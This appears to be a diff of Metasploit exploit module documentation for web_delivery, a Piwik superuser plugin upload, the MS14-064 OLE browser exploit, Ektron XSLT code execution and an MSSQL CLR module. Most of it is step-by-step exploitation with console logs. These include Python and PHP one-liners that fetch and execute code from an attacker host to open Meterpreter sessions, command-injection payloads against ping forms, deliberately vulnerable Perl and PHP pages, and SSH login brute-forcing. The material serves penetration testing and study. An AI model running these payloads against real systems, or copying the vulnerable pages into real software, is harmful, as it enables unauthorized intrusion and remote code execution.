![openoffice_macro_demo](https://cloud.githubusercontent.com/assets/1170914/22761020/9e7667ca-ee1e-11e6-9fc1-a29c55f405f0.gif)
## Modification
Since social engineering will play a big part in the success of the attack, you will most likely
want to modify the odt file.
1. To do so, first use msfconsole to generate the malicious odt file.
2. Move the odt file to a system that has OpenOffice or LibreOffice
3. You can just use OpenOffice/LibreOffice to edit the file. Make sure you don't modify the macro
code unless you actually know what you're doing.

313
documentation/modules/exploit/multi/script/web_delivery.md
View File

@ -1,16 +1,13 @@
As a web server, the web_delivery module provides a stealthy way to deliver a payload during post exploitation because the payload does not touch the disk.
The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
Currently, web_delivery supports three different languages for delivery: Python, PHP, and
Powershell. You should be able to tell which one you can use based on the target environment
you are in.
The web_delivery module supports three different languages for delivery: Python, PHP, and
Powershell. You should manually select the correct target based on the victim environment you are exploiting.
For example, if you gained access through a PHP application, it's safe to assume you can use PHP. If you're in a Windows server, such as Windows Server 2008, then it's probably safe to say the target supports Powershell.
For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
## Verification Steps
To be able to use the web_delivery module, you must gain access to the target machine first, with the ability to execute either the Python, or PHP, or Powershell interpreter.
At that point, you would use the web_delivery module like in the following example:
To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:
1. Start msfconsole
2. Run: ```use exploit/multi/script/web_delivery```
@ -20,57 +17,319 @@ At that point, you would use the web_delivery module like in the following examp
6. Do: ```run```
7. At this point, a handler is up for that payload, and the module should instruct you to execute a command.
8. Copy the command. Depending on your pentesting scenario, you can either inject the
command and get code execution, or run it from the target's shell and get a session:
command into a vulnerable application, or run it from the target's shell and get a session:
```
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.23.1:4444
[*] Started reverse TCP handler on 192.168.2.1:4444
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.2.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600
[*] Sending stage (33684 bytes) to 192.168.2.134
[*] Meterpreter session 1 opened (192.168.2.1:4444 -> 192.168.2.134:41684) at 2016-03-02 11:41:34 -0600
```
## Targets
**Python**
Python is a fairly popular language, especially on Unix-based systems. By default, it has come with Ubuntu Linux since 8.04, as well as Debian, and Mac OS X since 10.3.
Python is a popular language, especially on Unix-based systems. It has shipped by default with Ubuntu Linux since version 8.04, Mac OS X since version 10.3, and is widely available on other systems as well.
**PHP**
PHP is a fairly popular language for web servers, especially Apache.
PHP is often found on web servers, especially in shared hosting environments. It is the basis for popular web applications such as WordPress, Joomla, and Drupal.
**Powershell/Windows**
Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2
are the first Windows versions to come with Powershell by default. Older Windows systems such as XP
don't come with it by default, but it is still possible to see it installed on a corporate network.
Powershell is a popular language on modern Windows systems, largely replacing batch files and Windows Scripting Host for Windows automation. Windows 7 and Windows Server 2008 R2 were the first versions to come with Powershell by default. Older Windows systems, such as XP and Server 2003, can still have it installed as an optional component.
## Scenarios
**Against a compromised web application**
web_delivery would work nicely for a web application with a command execution vulnerability.
One way to approach this would be:
web_delivery works nicely against a web application with a command execution vulnerability. One way to approach this would be:
1. Start exploit/multi/script/web_delivery
2. Use [Burp Suite](https://portswigger.net/burp/) to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.
3. If the modified HTTP/HTTPS request is successful, you should get a session.
**Shell upgrade**
web_delivery is also useful to upgrade a shell type payload to a Meterpreter one.
web_delivery is also useful to upgrade a shell type payload to a Meterpreter one. Here's how that can be done:
Here's how that can be done:
1. Start exploit/multi/script/web_delivery that generates/
2. In msfconsole, interact with the shell, and copy/paste the command.
1. Start `exploit/multi/script/web_delivery` that generates the command to inject.
2. Interact with the shell, and copy/paste the command.
3. You should get a Meterpreter session.
An example of this process can be seen below where an Ubuntu 14.04 victim is first exploited through `auxialiary/scanner/ssh/ssh_login`, and then upgraded via `web_delivery`.
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login) > set password ubuntu
password => ubuntu
msf auxiliary(ssh_login) > run
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:35219 -> 192.168.2.156:22) at 2017-03-05 19:57:53 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using URL: http://0.0.0.0:8080/DovbvqRaB
[*] Local IP: http://192.168.2.117:8080/DovbvqRaB
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/DovbvqRaB'); exec(r.read());"
msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/DovbvqRaB'); exec(r.read());"
[*] 192.168.2.156 web_delivery - Delivering Payload
[*] Sending stage (38500 bytes) to 192.168.2.156
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35840) at 2017-03-05 19:59:44 -0500
^Z
Background session 1? [y/N] y
msf exploit(web_delivery) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : Ubuntu14
OS : Linux 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016
Architecture : x64
Meterpreter : python/linux
meterpreter >
```
## Vulnerable Pages
### Perl cgi
These instructions will create a cgi environment and a vulnerable perl application for exploitation. We used Kali rolling (2016.2) for this tutorial.
#### Setup
In this example, we make a `post` form that pings a user provided IP, which is a typical funtion on many routers and is often abused a similar manner.
1. Enable cgi: `a2enmod cgid`
2. `mkdir /var/www/cgi-bin`
3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
4. Create the vulnerable page by writing the following text to `/var/www/cgi-bin/example.pl`:
```
#!/usr/bin/perl
use CGI qw(:standard);
$query = new CGI;
print $query->header( -type=> "text/html"),
$query->start_html();
$query->import_names( 'Q' );
if ( $Q::ip ) {
print `ping -c 1 $Q::ip`, "<hr>";
}
print $query->start_form( -name=>"ping", -method=>"POST", -enctype=>&CGI::URL_ENCODED),
$query->p("Enter IP to ping:"),
$query->textfield(-name=>"ip"), #, -id=>"ip"),
$query->submit(-name=>"submit"),
$query->end_form(),
$query->end_html();
```
5. Make it executable: `chmod +x /var/www/cgi-bin/example.pl`
We can verify this page is exploitable by chaining commands so instead of submitting `127.0.0.1` we'll submit `127.0.0.1;whoami`.
`curl -X POST http://127.0.0.1/cgi-bin/example.pl --data-urlencode "ip=127.0.0.1;whoami&submit=submit"`
or via GET request:
`curl "http://127.0.0.1/cgi-bin/example.pl?ip=127.0.0.1%3Bwhoami&submit=submit"` (note url encoding)
```
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.030/0.030/0.030/0.000 ms
www-data
<hr><form method="post" action="/cgi-bin/example.pl" enctype="application/x-www-form-urlencoded" name="ping"><p>Enter IP to ping:</p><input type="text" name="ip" value="127.0.0.1;whoami" /><input type="submit" name="submit" value="submit" /></form>
</body>
</html>
```
### Exploitation
1. `use exploit/multi/script/web_delivery`
2. `set lhost 192.168.2.117`
3. `exploit`
```
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using URL: http://0.0.0.0:8080/vNPlsjE
[*] Local IP: http://192.168.2.117:8080/vNPlsjE
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/vNPlsjE'); exec(r.read());"
msf exploit(web_delivery) >
```
Now browse to the site, and submit the form with the text `127.0.0.1;python -c "import urllib2; r = urlli7:8080/vNPlsjE'); exec(r.read());"`. If the site seems to freeze, exploitation was most likely successful.
```
[*] 192.168.2.117 web_delivery - Delivering Payload
[*] Sending stage (38500 bytes) to 192.168.2.117
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.117:47660) at 2017-03-04 14:52:38 -0500
```
or we can exploit via curl after escaping the double quotes. Note we use `--data-urlencode` to automatically encode for us:
```
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using URL: http://0.0.0.0:8080/OKNzr8B59zWp
[*] Local IP: http://192.168.2.117:8080/OKNzr8B59zWp
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/OKNzr8B59zWp'); exec(r.read());"
msf exploit(web_delivery) > curl -X POST http://127.0.0.1/cgi-bin/example.pl --data-urlencode "ip=127.0.0.1;python -c \"import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/OKNzr8B59zWp'); exec(r.read());\"&submit=submit"
[*] exec: curl -X POST http://127.0.0.1/cgi-bin/example.pl --data-urlencode "ip=127.0.0.1;python -c \"import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/OKNzr8B59zWp'); exec(r.read());\"&submit=submit"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
[*] 192.168.2.117 web_delivery - Delivering Payload
[*] Sending stage (38500 bytes) to 192.168.2.117
[*] Meterpreter session 4 opened (192.168.2.117:4444 -> 192.168.2.117:47688) at 2017-03-04 15:02:35 -0500
100 1172 0 981 100 191 233 45 0:00:04 0:00:04 --:--:-- 233
100 1172 0 981 100 191 158 30 0:00:06 0:00:06 --:--:-- 0^CInterrupt: use the 'exit' command to quit
msf exploit(web_delivery) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
4 meterpreter python/linux www-data @ k 192.168.2.117:4444 -> 192.168.2.117:47688 (192.168.2.117)
```
### PHP
In this example we make a `post` form that pings a user provided IP, which is a typical function on many routers and is often abused in a similar manner.
1. Enable cgi: `a2enmod php7.0`
2. Create the vulnerable page by writing the following text to `/var/www/html/example.php`:
```
<html>
<body>
<?php
if ($_POST["ip"]){
print( shell_exec('ping -c 1 '.$_POST["ip"]) . "<hr>");
}
print("<form method=\"post\"
action=\"/example.php\"
enctype=\"application/x-www-form-urlencoded\"
name=\"ping\">
<p>Enter IP to ping:</p><input type=\"text\" name=\"ip\" value=\"\" />
<input type=\"submit\" name=\"submit\" value=\"submit\" /></form>");
?>
</body>
</html>
```
We can verify this page is exploitable by chaining commands so instead of submitting `127.0.0.1` we'll submit `127.0.0.1;whoami`.
`curl -X POST http://127.0.0.1/example.php --data-urlencode "ip=127.0.0.1;whoami&submit=submit"`
```
<html>
<body>
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.016 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.016/0.016/0.016/0.000 ms
www-data
<hr><form method="post"
action="/example.php"
enctype="application/x-www-form-urlencoded"
name="ping">
<p>Enter IP to ping:</p><input type="text" name="ip" value="" />
<input type="submit" name="submit" value="submit" /></form> </body>
</html>
```
### Exploitation
1. `use exploit/multi/script/web_delivery`
2. `set lhost 192.168.2.117`
3. `set target 1`
4. `set payload php/meterpreter/reverse_tcp`
5. `exploit`
```
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using URL: http://0.0.0.0:8080/de3uw0
[*] Local IP: http://192.168.2.117:8080/de3uw0
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.2.117:8080/de3uw0'));"
msf exploit(web_delivery) >
```
Now browse to the site, and submit the form with the text `127.0.0.1;php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.2.117:8080/de3uw0'));"`. If the site seems to freeze, exploitation was most likely successful.
```
[*] 192.168.2.117 web_delivery - Delivering Payload
[*] Sending stage (33986 bytes) to 192.168.2.117
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.117:48138) at 2017-03-04 15:36:31 -0500
```
or we can exploit via curl after escaping the double quotes. Note we use `--data-urlencode` to automatically encode for us:
```
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using URL: http://0.0.0.0:8080/OKNzr8B59zWp
[*] Local IP: http://192.168.2.117:8080/OKNzr8B59zWp
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/OKNzr8B59zWp'); exec(r.read());"
msf exploit(web_delivery) > curl -X POST http://127.0.0.1/cgi-bin/example.pl --data-urlencode "ip=127.0.0.1;php -d allow_url_fopen=true -r \"eval(file_get_contents('http://192.168.2.117:8080/de3uw0'));\"&submitsubmit"
[*] exec: curl -X POST http://127.0.0.1/cgi-bin/example.pl --data-urlencode "ip=127.0.0.1;php -d allow_url_fopen=true -r \"eval(file_get_contents('http://192.168.2.117:8080/de3uw0'));\"&submitsubmit"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 490 0 329 100 161 11490 5623 --:--:-- --:--:-- --:--:-- 11344
[*] 192.168.2.117 web_delivery - Delivering Payload
[*] Sending stage (33986 bytes) to 192.168.2.117
[*] Meterpreter session 3 opened (192.168.2.117:4444 -> 192.168.2.117:48144) at 2017-03-04 15:39:05 -0500
100 1132 0 971 100 161 440 73 0:00:02 0:00:02 --:--:-- 440^CInterrupt: use the 'exit' command to quit
```

226
documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md Normal file
View File

@ -0,0 +1,226 @@
## Vulnerable Application
Piwik can be downloaded from the official site [piwik.org](https://piwik.org).
Older builds are also available from [builds.piwik.org](https://builds.piwik.org/).
This module was tested with Piwik versions 2.14.0, 2.16.0, 2.17.1 and 3.0.1
## Verification Steps
### Install Piwik (Debian/Ubuntu)
1. Install dependencies
```
sudo apt install apache2 php5 php5-mysql \
libapache2-mod-php5 mariadb-server unzip php5-gd php5-curl
```
2. Download latest version of piwik (or the version of your choice from [builds.piwik.org](https://builds.piwik.org/))
```
wget https://builds.piwik.org/piwik.zip
```
3. Unzip Piwik into webroot
```
unzip -d /var/www/html/ piwik.zip
```
4. Make the webserver user the owner of piwik
```
chown -R www-data:www-data /var/www/html/
```
5. Create a new user and database for piwik. If you want to run multiple versions in parallel use a different database for each install (user is optional).
This example assumes your MySQL root password is **password**
```
mysql -u root -ppassword -e "CREATE DATABASE piwik;"
mysql -u root -ppassword -e "CREATE USER piwik@localhost;"
mysql -u root -ppassword -e "SET PASSWORD FOR piwik@localhost=PASSWORD('piwik');"
mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik.* TO piwik@localhost;"
mysql -u root -ppassword -e "FLUSH PRIVILEGES;"
```
6. Add a config setting to PHP to stop piwik complaining about it
```
echo always_populate_raw_post_data=-1 > /etc/php5/apache2/conf.d/99-piwik.ini
```
7. Finally restart Apache HTTPD
```
service apache2 restart
```
### Pwn Piwik
1. Install the application (see installation steps above)
2. Start msfconsole
3. Do: ```use [module path]```
4. Do: ```set RHOST [Domain/IP]```
5. Do: ```set RPORT [Port]```
6. Do: ```set TARGETURI [installation directory]```
7. Do: ```set SSL [True/False]```
8. Do: ```set USERNAME [valid Piwik superuser credentials]```
9. Do: ```set PASSWORD [valid Piwik superuser credentials]```
10. Do: ```run```
11. You should get a shell.
## Options
**TARGETURI**
Path of the Piwik installation.
**USERNAME**
Valid username for a Piwik superuser account.
**PASSWORD**
Valid password for a Piwik superuser account.
## Scenarios
### Run with a installation of Piwik 3.0.1
```
msf > use exploit/unix/webapp/piwik_superuser_plugin_upload
msf exploit(piwik_superuser_plugin_upload) > set TARGETURI /piwik/
TARGETURI => /piwik/
msf exploit(piwik_superuser_plugin_upload) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(piwik_superuser_plugin_upload) > set username firefart
username => firefart
msf exploit(piwik_superuser_plugin_upload) > set password firefart
password => firefart
msf exploit(piwik_superuser_plugin_upload) > options
Module options (exploit/unix/webapp/piwik_superuser_plugin_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD firefart yes The Piwik password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.56.2 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /piwik/ yes The URI path of the Piwik installation
USERNAME firefart yes The Piwik username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Piwik
msf exploit(piwik_superuser_plugin_upload) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Checking if user firefart has superuser access
[+] User firefart has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin SDsiXxPMgt generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:43169) at 2017-02-13 23:03:29 +0100
[+] Deleted plugins/SDsiXxPMgt/plugin.json
[+] Deleted plugins/SDsiXxPMgt/SDsiXxPMgt.php
meterpreter > sysinfo
Computer : web
OS : Linux web 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
Meterpreter : php/linux
```
### Run against Piwik 2.x
```
msf exploit(piwik_superuser_plugin_upload) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Checking if user firefart has superuser access
[+] User firefart has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 2.14.0
[*] Generating plugin
[+] Plugin zZETuwYkzB generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.2:43182) at 2017-02-13 23:05:27 +0100
[+] Deleted plugins/zZETuwYkzB/plugin.json
[+] Deleted plugins/zZETuwYkzB/zZETuwYkzB.php
```
### Sample output of running with invalid credentials
```
msf exploit(piwik_superuser_plugin_upload) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:test...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with Piwik
[*] Exploit completed, but no session was created.
```
### Sample output of running with non superuser user
```
msf exploit(piwik_superuser_plugin_upload) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using test:firefart...
[+] Authenticated with Piwik
[*] Checking if user test has superuser access
[-] Exploit aborted due to failure: no-access: Looks like user test has no superuser access
[*] Exploit completed, but no session was created.
```
### Sample output of Piwik 3.x with disabled Marketplace plugin
```
msf exploit(piwik_superuser_plugin_upload) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Checking if user firefart has superuser access
[+] User firefart has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[*] Marketplace plugin is not enabled, trying to enable it
[+] Marketplace plugin enabled
[*] Generating plugin
[+] Plugin TuwgJygjEu generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.2:43246) at 2017-02-13 23:08:36 +0100
[+] Deleted plugins/TuwgJygjEu/plugin.json
[+] Deleted plugins/TuwgJygjEu/TuwgJygjEu.php
```

97
documentation/modules/exploit/windows/browser/ms14_064_ole_code_execution.md Normal file
View File

@ -0,0 +1,97 @@
## Vulnerable Application
This module exploits the Windows OLE Automation array vulnerability, [CVE-2014-6332](https://www.cvedetails.com/cve/cve-2014-6332). The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 boxes. This is because from Windows 8 upward Internet Explorer blocks the payload from executing. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
## Verification Steps
1. Start msfconsole
1. Do: ```use exploit/windows/browser/ms14_064_ole_code_execution```
1. Do: ```Choose a payload and set any specific options```
1. Do: ```run```, after a target browses to the generated URL, you should receive a session.
## Options
**TRYUAC**
Ask victim to start as Administrator. This option only works on Windows 7 targets.
**AllowPowershellPrompt**
Allow exploit to try Powershell. If exploiting a Windows 7 target you need to enable this option.
## Scenarios
### Windows XP Pro SP3 x86 with IE 8.0.6001.18702
The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.207`.
```
msf > use exploit/windows/browser/ms14_064_ole_code_execution
msf exploit(ms14_064_ole_code_execution) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.2.3
LHOST => 192.168.2.3
msf exploit(ms14_064_ole_code_execution) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.3:4444
msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/hGA1Ux
[*] Local IP: http://192.168.2.3:8080/hGA1Ux
[*] Server started.
[*] 192.168.2.207 ms14_064_ole_code_execution - Gathering target information for 192.168.2.207
[*] 192.168.2.207 ms14_064_ole_code_execution - Sending HTML response to 192.168.2.207
[*] 192.168.2.207 ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.2.207 ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (957487 bytes) to 192.168.2.207
[*] Meterpreter session 1 opened (192.168.2.3:4444 -> 192.168.2.207:1299) at 2017-03-01 19:07:12 +0100
msf exploit(ms14_064_ole_code_execution) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : MACHINE
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Windows 7 Pro SP1 x64 with IE 8.0.7601.17514
The attacker's IP is `192.168.2.3` and the victim's IP is `192.168.2.208`. Unlike on the Windows XP, target victim will see a popup dialog apear and they will have to allow the execution of the PowerShell script for the exploit to work. You need to set `AllowPowershellPrompt` option to `true` otherwise the exploit won't work on Windows 7.
```
msf > use exploit/windows/browser/ms14_064_ole_code_execution
msf exploit(ms14_064_ole_code_execution) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms14_064_ole_code_execution) > set LHOST 192.168.2.3
LHOST => 192.168.2.3
msf exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
AllowPowershellPrompt => true
msf exploit(ms14_064_ole_code_execution) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.2.3:4444
msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/6tdgNjLVij3zs
[*] Local IP: http://192.168.2.3:8080/6tdgNjLVij3zs
[*] Server started.
[*] 192.168.2.208 ms14_064_ole_code_execution - Gathering target information for 192.168.2.208
[*] 192.168.2.208 ms14_064_ole_code_execution - Sending HTML response to 192.168.2.208
[*] 192.168.2.208 ms14_064_ole_code_execution - Sending exploit...
[*] Sending stage (957487 bytes) to 192.168.2.208
[*] Meterpreter session 1 opened (192.168.2.3:4444 -> 192.168.2.208:49197) at 2017-03-01 19:35:12 +0100
msf exploit(ms14_064_ole_code_execution) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WINDOWS7_X64
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```

72
documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md Normal file
View File

@ -0,0 +1,72 @@
## Vulnerable Application
[Ektron Content Management System (CMS)](http://www.episerver.com/cms/ektron/) 8.0, 8.5, and 8.7 before 8.7sp2 and 9.0 before sp1 (according to CVE-2015-0923)
Ektron has been acquired by Epi Server and finding installers may prove difficult.
## Verification Steps
But if you can build a test network the following may be used to verify:
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/http/ektron_xslt_exec_ws```
4. Do: ```set RHOST [target ip]```
5. Do: ```check```
6. You should receive a target vulnerable message.
7. Do: ```exploit```
8. You should get a shell.
In our experience testing against 64 bit hosts should still pass the 'check' in step 6 and return a target vulnerable message. But when injecting shellcode into a new thread it may require the tester to adjust the payload as well. This may be done as follows:
1. Do ```set PAYLOAD windows/x64/meterpreter```
## Options
These are important but perhaps less-used options. There are quite a few other 'web' options available which will not be discussed due to their generality.
**TARGETOP**
There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional operations by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString
This value defaults to ContentBlockEx (from the original reports). Testers may find adjusting this value useful if defenders have included Web Application Firewall (WAF) rules to specifically filter ContentBlockEx as a mitigation in lieu of updating.
**TARGETURI**
This allows the tester to adjust the base-installation path. The default value is '/cms400min' but in our experience many deployments are simply the root path '/'.
## Scenarios
Checking if a target is vulnerable.
```
msf > use exploit/windows/http/ektron_xslt_exec_ws
msf exploit(ektron_xslt_exec_ws) > set RHOST 192.168.1.175
RHOST => 192.168.1.175
msf exploit(ektron_xslt_exec_ws) > check
[+] 192.168.1.175:80 The target is vulnerable
msf exploit(ektron_xslt_exec_ws) >
```
Exploiting a Win7 x64 installation to obtain shell.
```
msf > use exploit/windows/http/ektron_xslt_exec_ws
msf exploit(ektron_xslt_exec_ws) > set RHOST 192.168.1.175
RHOST => 192.168.1.175
msf exploit(ektron_xslt_exec_ws) > check
[+] 192.168.1.175:80 The target is vulnerable.
msf exploit(ektron_xslt_exec_ws) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ektron_xslt_exec_ws) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf exploit(ektron_xslt_exec_ws) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Generating the EXE Payload and the XSLT...
[*] Trying to run the xslt transformation...
[+] Exploitation was successful
[*] Sending stage (1189423 bytes) to 192.168.1.175
[*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.175:49169) at 2016-10-30 04:36:50 +0000
meterpreter >
```

84
documentation/modules/exploit/windows/mssql/mssql_clr_payload.md Normal file
View File

@ -0,0 +1,84 @@
## Introduction
This module is based on the work that was done by @leechristensen and @sekirkity as documented [here](http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/).
## Prerequisites
The module requires SQL credentials for a user with sufficient privileges to:
* Enable CLR support (if not already enabled).
* Enabled `TRUSTWORTHY` (if not already enabled).
* Add an assembly to the server.
* Create a new stored procedure.
